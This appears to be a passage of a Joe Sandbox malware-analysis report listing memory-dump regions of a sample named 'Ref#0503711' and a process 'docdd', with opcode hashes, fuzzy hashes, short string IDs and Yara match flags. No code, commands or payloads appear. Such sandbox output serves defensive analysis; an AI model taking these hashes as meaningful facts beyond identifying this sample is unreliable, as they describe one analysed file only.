                                                                • API ID:
                                                                • String ID: LR^q
                                                                • API String ID: 0-2625958711
                                                                • Opcode ID: 84055fca7edcec707fb852c7e7cbb648d6e60916c9f3610ebde066b2ef7ae177
                                                                • Instruction ID: 97c793ca7e3862b088777e4251c18ddf6447a56cca9bed34b5a1e703e0e654a8
                                                                • Opcode Fuzzy Hash: 84055fca7edcec707fb852c7e7cbb648d6e60916c9f3610ebde066b2ef7ae177
                                                                • Instruction Fuzzy Hash: C8919471E002198FDB19CFA8C981BADB7B2FF85305F29C5A9D019AB255D734AD81CF80
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PH^q
                                                                • API String ID: 0-2549759414
                                                                • Opcode ID: 6353b5b02f4618d9db08a4ab0ecf20eaa0060c401649eed67831443710d3f0df
                                                                • Instruction ID: 612514726bd579ae721cd645ac84ea63dffcffa16c329ad4fa9ebbb56d5ef491
                                                                • Opcode Fuzzy Hash: 6353b5b02f4618d9db08a4ab0ecf20eaa0060c401649eed67831443710d3f0df
                                                                • Instruction Fuzzy Hash: 1B91E270E95319CFEBA4CFE9D484BADBBF2BB49345F2080AAD409A7251D7744984CF40
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4|cq
                                                                • API String ID: 0-1781815312
                                                                • Opcode ID: 349aeb8055492b440ec6e239070ef28bde8f13c611a867a1b896727ad80254ca
                                                                • Instruction ID: f2472151260fec19aa5074047f28af0573ec925a13fe734e7bb8fe6b6dfc1bb3
                                                                • Opcode Fuzzy Hash: 349aeb8055492b440ec6e239070ef28bde8f13c611a867a1b896727ad80254ca
                                                                • Instruction Fuzzy Hash: FF71E470E55218DFEB64CFAAC884B9DBBF2FF89340F1481AAD409A7251DB345A85CF41
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4|cq
                                                                • API String ID: 0-1781815312
                                                                • Opcode ID: 7f0f815b496d07bc9fd29c3dbb750786bd3c0dd48694f26098bd8e4129a21db8
                                                                • Instruction ID: 0112d2284d1c8e723d4e3d4432aac950fb209f6cc21daf55c7ab0ea2d38f57a4
                                                                • Opcode Fuzzy Hash: 7f0f815b496d07bc9fd29c3dbb750786bd3c0dd48694f26098bd8e4129a21db8
                                                                • Instruction Fuzzy Hash: 7071E670E55218DFEBA4CF6AC884BDDBBF2FB89340F1081AAD409A7251DB345A85CF41
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: 4ceb0141c698ea2016ba89233ab5cccd09d466a00a3ad70cd5ed64957b35951d
                                                                • Instruction ID: 4a8ffcdeb84524e411a5c4198fee617a09430f8cef890bf74c2f9e5343de4729
                                                                • Opcode Fuzzy Hash: 4ceb0141c698ea2016ba89233ab5cccd09d466a00a3ad70cd5ed64957b35951d
                                                                • Instruction Fuzzy Hash: 4151CE32F0015A9FDB10DBADD8801AEBBB2FFC5225B588576C518CB609E730E946C790
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1719727888.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: true
                                                                • Associated: 00000000.00000002.1719009997.0000000005FA0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5fa0000_Ref#0503711.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: z
                                                                • API String ID: 0-1657960367
                                                                • Opcode ID: abb8eff6ab086e00a93e866d11e0c77618db0f32fb18bf58f51b3fc5d527ace3
                                                                • Instruction ID: 1ad26b7fd8521e479364074b928664793fd873b84742408675c897cafec337bf
                                                                • Opcode Fuzzy Hash: abb8eff6ab086e00a93e866d11e0c77618db0f32fb18bf58f51b3fc5d527ace3
                                                                • Instruction Fuzzy Hash: 1E418871D056188BEB58DF6BDC4869DBBF7AFC8300F14C1EA940DAB224DB741A818F44
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d986eedcf87247ed1c338600265840cb0787e5df7f8e4eb5e7a79ce7ff27b1d4
                                                                • Instruction ID: eff00f36854e83d0658db84d64d61f1407cb70fcd017e907429cd3db1b4a1d17
                                                                • Opcode Fuzzy Hash: d986eedcf87247ed1c338600265840cb0787e5df7f8e4eb5e7a79ce7ff27b1d4
                                                                • Instruction Fuzzy Hash: 2991DEB0D06218CFEB14DFA9C549BEDBBF1BF88315F2085AAD419B7250D7780A45CB54
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2471ae56e9779860faec2120ff901e7b318cf526b37374319dea78d0ce68bf8e
                                                                • Instruction ID: 9f338ac185f3422d15d3c581d4a328cbed96bace828c7fe0abcb2e276166b2f5
                                                                • Opcode Fuzzy Hash: 2471ae56e9779860faec2120ff901e7b318cf526b37374319dea78d0ce68bf8e
                                                                • Instruction Fuzzy Hash: 5B916A70E82218CFEB94CFA8D884BEDBBF2FB49309F10946AD459A7251DB755984CF40
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b3ae91197fb66940d53f577be6ae915e8ba9a116cfa53c423802caa446e99dc6
                                                                • Instruction ID: 04c51f75d5b7d3b54f64d70ff9c5d8586f09564448ed45ec6f1774769b66a6b8
                                                                • Opcode Fuzzy Hash: b3ae91197fb66940d53f577be6ae915e8ba9a116cfa53c423802caa446e99dc6
                                                                • Instruction Fuzzy Hash: 13914B70E85228CFEB94CFA8D884BEDBBF2FB49309F10946AD419A7250DB755984CF40
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 86a2ac555a6a52201782be529421ab1d3d9d0d4e28f8c798acc0eaf277772461
                                                                • Instruction ID: 53176e20612b701c5242520139bf327d2a782577eb8a351e7564e94be47b9289
                                                                • Opcode Fuzzy Hash: 86a2ac555a6a52201782be529421ab1d3d9d0d4e28f8c798acc0eaf277772461
                                                                • Instruction Fuzzy Hash: 3091DCB0D0A218CFEB14DFA9C9497EEBBF1BF48305F2085AAD419B7250E7780A45CB54
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8ee2b37a92d7db586267087acab2279d184873aa6a621cfb170239039dbb3be0
                                                                • Instruction ID: ce7d4816d781e430a00f7808459b8373083b2f2812abe5111e23b1e98f29852b
                                                                • Opcode Fuzzy Hash: 8ee2b37a92d7db586267087acab2279d184873aa6a621cfb170239039dbb3be0
                                                                • Instruction Fuzzy Hash: 46912B70E86218CFEB95CF68D884BEDBBF2FB49309F10946AD409A7251D7755984CF40
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725206638.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6340000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 46d02829084e659ce4342de2c397e4d909ccd0df58b7f1911affc199c6acbc63
                                                                • Instruction ID: 2d24a583aa1dd98995c36a8054e7f6aeb59f6cb9c03904ff9f3b081a70f7c519
                                                                • Opcode Fuzzy Hash: 46d02829084e659ce4342de2c397e4d909ccd0df58b7f1911affc199c6acbc63
                                                                • Instruction Fuzzy Hash: E18149B0D04318CFEBA4DFA5C844BDDBBB5BF89300F5190A9C809A7250DB749989CF85
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb167ba8cce37b004f3af6df7bf6885ca5a93b76e03a84471bf95305bb7bc21a
                                                                • Instruction ID: 57c625234f485690dc12a402730bc31a3f6708f3e1f117c3d164bb7c2d59b743
                                                                • Opcode Fuzzy Hash: bb167ba8cce37b004f3af6df7bf6885ca5a93b76e03a84471bf95305bb7bc21a
                                                                • Instruction Fuzzy Hash: 91614E32F205268FD715DB69CC84A5EB7E3AFC8711F1A8164E409DB369DE35EC028B80
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723348881.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60c0000_Ref#0503711.jbxd
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723348881.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60c0000_Ref#0503711.jbxd
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723348881.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60c0000_Ref#0503711.jbxd
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723348881.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60c0000_Ref#0503711.jbxd
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723580227.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60e0000_Ref#0503711.jbxd
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725206638.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6340000_Ref#0503711.jbxd
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1719727888.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: true
                                                                • Associated: 00000000.00000002.1719009997.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5fa0000_Ref#0503711.jbxd
                                                                Yara matches
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725206638.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6340000_Ref#0503711.jbxd
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723348881.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60c0000_Ref#0503711.jbxd
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (_^q$(_^q$(_^q$(_^q
                                                                • API String ID: 0-2697572114
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725062334.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6210000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $#$($;
                                                                • API String ID: 0-291558309
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725062334.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6210000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #$$$($F
                                                                • API String ID: 0-3155957929
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$\s^q
                                                                • API String ID: 0-2586804783
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$\s^q
                                                                • API String ID: 0-2586804783
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$\s^q
                                                                • API String ID: 0-2586804783
                                                                • Opcode ID: 97536a9353586f9c3fa569c16fe080101fe540b0e0582c03844427902a1f9412
                                                                • Instruction ID: 732d43d4319410d81715fcb32a353d7536b8b1809137cd799e7451d1b8bd05aa
                                                                • Opcode Fuzzy Hash: 97536a9353586f9c3fa569c16fe080101fe540b0e0582c03844427902a1f9412
                                                                • Instruction Fuzzy Hash: 70E14A75A0112A9FDB14CFB9D844AADB7F2BFC8305F11C569D40AEB354DB30AD468B90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$\s^q
                                                                • API String ID: 0-2586804783
                                                                • Opcode ID: 260122ad5ca58f82ee4a14a3eb765aed8ee8004d07b40d8faff0ef4442a57652
                                                                • Instruction ID: 8a5b08d8a3944d17acc29eeae8fd002bbcc9900fe785546b39dbdf2a8acf981a
                                                                • Opcode Fuzzy Hash: 260122ad5ca58f82ee4a14a3eb765aed8ee8004d07b40d8faff0ef4442a57652
                                                                • Instruction Fuzzy Hash: D7D15C75A0112A9FDB14CFB9D844AADB7F2BFC8305F11C669D40AEB354DB30AD468B90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \s^q
                                                                • API String ID: 0-4111632511
                                                                • Opcode ID: 21c8c1b5d7c936bf7259b3a5f015422c517be386016937728a56b3ac617fdc6d
                                                                • Instruction ID: 1d6e2d43cf21e4ff9af330cd07fa25a46f41a18de22530e22266eb7512a59b85
                                                                • Opcode Fuzzy Hash: 21c8c1b5d7c936bf7259b3a5f015422c517be386016937728a56b3ac617fdc6d
                                                                • Instruction Fuzzy Hash: 7A81D678E4010E9FDF14DFA9D985AAEBBF1FB48304F20A559D406EB264DB31AA41CB50
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ac279f50d45a1094c09c877fecb1a39032e67e36ccae22ce697216a31605e6a5
                                                                • Instruction ID: 757e4d29d0ea4d8ceb22e8af647936457399ff9d71bd0f4e9f22a7d6f8c1187a
                                                                • Opcode Fuzzy Hash: ac279f50d45a1094c09c877fecb1a39032e67e36ccae22ce697216a31605e6a5
                                                                • Instruction Fuzzy Hash: D1818D36F105159FC714DB69D884A5EB7E3AFC8710F1A81A5E40ADB366EE34ED028B81
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 716650749995c8ad78ad444cc7d9e45af9f92d464fc3b2e1e0ab43f3abf6a841
                                                                • Instruction ID: c90c4fd943b1d61ea3552d452058ffc94c0ea66cd0e44d6c5429e6b8b381a3aa
                                                                • Opcode Fuzzy Hash: 716650749995c8ad78ad444cc7d9e45af9f92d464fc3b2e1e0ab43f3abf6a841
                                                                • Instruction Fuzzy Hash: 83616C36F105258FD754DB69C884A5EB3E3AFC8710F1AC1A5E409DB366DE74ED028B81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: XPrq$\s^q
                                                                • API String ID: 0-557565383
                                                                • Opcode ID: e34f273f3b9d9a0bdde352e9017147c2b28235f01beea7243ced7f26de08ba7b
                                                                • Instruction ID: 4bd2539409d911daa6579b867cb216f2c39d7840d5d300831408959ffc467ee6
                                                                • Opcode Fuzzy Hash: e34f273f3b9d9a0bdde352e9017147c2b28235f01beea7243ced7f26de08ba7b
                                                                • Instruction Fuzzy Hash: 90410778D4020A9FDF14DFAAD9846EEBBF1FB88310F20A555D406EB264DB319942CB50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \s^q
                                                                • API String ID: 0-4111632511
                                                                • Opcode ID: 9ce3ab19dcdad0829febdfd569d6d865433c3a16cd1975430e76451f779688de
                                                                • Instruction ID: 82653612110e3ab80d2dcb04b3d2e32badbe53711c4f41680358125814c7f926
                                                                • Opcode Fuzzy Hash: 9ce3ab19dcdad0829febdfd569d6d865433c3a16cd1975430e76451f779688de
                                                                • Instruction Fuzzy Hash: 2151D978D4010A9FDF14DFA9D984AAEBBF1FF88300F10A569D406EB364DB359A46CB50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \s^q
                                                                • API String ID: 0-4111632511
                                                                • Opcode ID: ed5a5ce42b8799bac00f99d22b6c8bcb7e074e0c4549e4c6b5a05e1285b5b1c2
                                                                • Instruction ID: 11207c5c3a26bf471f288c2e0fe9742ab1db4a9edd159c9437da6d4db962fade
                                                                • Opcode Fuzzy Hash: ed5a5ce42b8799bac00f99d22b6c8bcb7e074e0c4549e4c6b5a05e1285b5b1c2
                                                                • Instruction Fuzzy Hash: F2512878E4010ADFDF14DFA9D9846AEBBF1FB88310F10A669D006EB364DB319946CB50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \s^q
                                                                • API String ID: 0-4111632511
                                                                • Opcode ID: c2088db2697446094390e801811e179fc172e7447cbae5adba1f7781506348bd
                                                                • Instruction ID: e624903851b65e765b98103b926f3596477b1fe48b1abbcd336f3417e8b3e79c
                                                                • Opcode Fuzzy Hash: c2088db2697446094390e801811e179fc172e7447cbae5adba1f7781506348bd
                                                                • Instruction Fuzzy Hash: F651FA78E4020A9FDF14DFA9D9806AEBBF1FF89304F10A565D005EB265DB319945CB50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \s^q
                                                                • API String ID: 0-4111632511
                                                                • Opcode ID: 999a184d2d50b193dbb1ee5451cf11575e0a052650cf974939fa206823407d29
                                                                • Instruction ID: d1095c3ee7714ad4195fffce30999db350e48f26c9320995af3f63018449cc86
                                                                • Opcode Fuzzy Hash: 999a184d2d50b193dbb1ee5451cf11575e0a052650cf974939fa206823407d29
                                                                • Instruction Fuzzy Hash: 1C51E878D4010E9FDF14DFA9D984AAEBBF1FF88300F10A569D406EB264DB319A46CB50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: d9ff8d01eab9579bd0c0deff2999e2e594d305aa2307f8cbc42fb7821c1e7683
                                                                • Instruction ID: 2fc810db04caa09b97e499f258aeb1f1322e65dc29c525b711a9604b3fbc3ccb
                                                                • Opcode Fuzzy Hash: d9ff8d01eab9579bd0c0deff2999e2e594d305aa2307f8cbc42fb7821c1e7683
                                                                • Instruction Fuzzy Hash: F6418B71F0011A8BCB10DFAAD8805AEFBF2FB84711B14C57AD518D7706E738E9568B92
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \s^q
                                                                • API String ID: 0-4111632511
                                                                • Opcode ID: 3fd654ab36221c8c0195ef4f75ccf3b997fa7c58f5a66c35e436ccff8d81755d
                                                                • Instruction ID: 7a2a13fad4bcb130e71fbfce78e80242653c669e1ff1c6ef650a9069c243f52e
                                                                • Opcode Fuzzy Hash: 3fd654ab36221c8c0195ef4f75ccf3b997fa7c58f5a66c35e436ccff8d81755d
                                                                • Instruction Fuzzy Hash: 53512A78D4010E9FDF14DFA9D9846AEBBF1FB48300F20A655D406EB260DB319A46CB50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \s^q
                                                                • API String ID: 0-4111632511
                                                                • Opcode ID: c78c3fbd3c9539c119d09d02e37500517c04024f536901fdfe9709365fafa8e4
                                                                • Instruction ID: e6ad46388ad3558518828bb8cc53cda0dd698022d5acc6c5428155e361211531
                                                                • Opcode Fuzzy Hash: c78c3fbd3c9539c119d09d02e37500517c04024f536901fdfe9709365fafa8e4
                                                                • Instruction Fuzzy Hash: 2341F778E4020ADFDF14DFA9D9846AEBBF1FF88310F20A559D406EB261DB319945CB50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1727443931.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_bd0000_docdd.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \s^q
                                                                • API String ID: 0-4111632511
